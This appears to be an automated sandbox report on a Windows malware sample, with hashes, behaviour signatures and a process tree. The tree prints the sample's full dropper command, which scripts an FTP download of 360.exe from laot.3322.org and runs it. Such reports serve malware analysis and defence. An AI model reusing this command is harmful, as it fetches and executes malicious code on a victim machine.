Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    09/10/2024, 06:56

General

  • Target

    2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe

  • Size

    44KB

  • MD5

    2cd18332e818c2273ba978198081cd77

  • SHA1

    253ffeb16bf88ff1590e87f438ceb5bade306ffb

  • SHA256

    045419ee981cea824228b99d0e1682bf443752cd22f7b09d3b5e5ea9a49b958d

  • SHA512

    4f3177a01daa9e34e2d1ab1119bcd7a653f820fd73890f5cbcd715016460cd0a2b7468c375833bb615a9e3641c053e9bd0ef5890828ac586d1c0ff7f4f00a839

  • SSDEEP

    768:xCmnG5OxBdbHk8yw6SYx27CbuwayDh5aeRghbo7te5MpGM9SD8qlG5jpYgXShIHV:kmGg9HjWJoeBayDkRace

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\2cd18332e818c2273ba978198081cd77_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2844
    • C:\Windows\SysWOW64\Cmd.exe
      Cmd /c echo open laot.3322.org>>ftpdate.sys&echo ccc>>ftpdate.sys&echo 123>>ftpdate.sys&echo bin>>ftpdate.sys&echo get 360.exe %windir%\system32\Microsoft\360.exe>>ftpdate.sys&echo bye>>ftpdate.sys&ftp -s:ftpdate.sys&del ftpdate.sys&%windir%\system32\Microsoft\360.exe&Del %windir%\system32\Microsoft\360.exe
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2888
      • C:\Windows\SysWOW64\ftp.exe
        ftp -s:ftpdate.sys
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2828
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\Sc.bat""
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:1216

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Sc.bat

          Filesize

          210B

          MD5

          b7fa4d1a0b27634c935c52e13c6eff97

          SHA1

          a20a7027dcb1db2269f153308183ed6bf9870777

          SHA256

          cf6bac03f02036269dc90bf90af84aaf6759b7bf1991359eff7178b997db1049

          SHA512

          4ab4e6ab8b8a609cbf9a6ce3effe8e7bf5e6b9d790c81c144704b9dc94aa6e486b4acc336ba9b4c33f4f5e430b15256bd91a38f807a33b051b46886e8a9b9563

        • C:\Users\Admin\AppData\Local\Temp\ftpdate.sys

          Filesize

          91B

          MD5

          842e6460bf164918765c229eb25a4b2a

          SHA1

          8d153a8d2c5334424a83b34a81fd9c329c3c5d38

          SHA256

          1039a3a5428926a53028775c042864d0441634ba498288d7e61bd3f3e71fec53

          SHA512

          4914fb4ad5b950721d4c69c75e74d9e6979219089a9bf991bddd79e3b704799cf4582c03b0ae84cfd2010f57eea1370a0121fd1c2b4b5af9ea88966a145a6725

        • memory/2844-2-0x0000000004930000-0x0000000005992000-memory.dmp

          Filesize

          16.4MB

        • memory/2844-26-0x0000000000400000-0x000000000041D000-memory.dmp

          Filesize

          116KB

        • memory/2844-35-0x0000000000400000-0x000000000041D000-memory.dmp

          Filesize

          116KB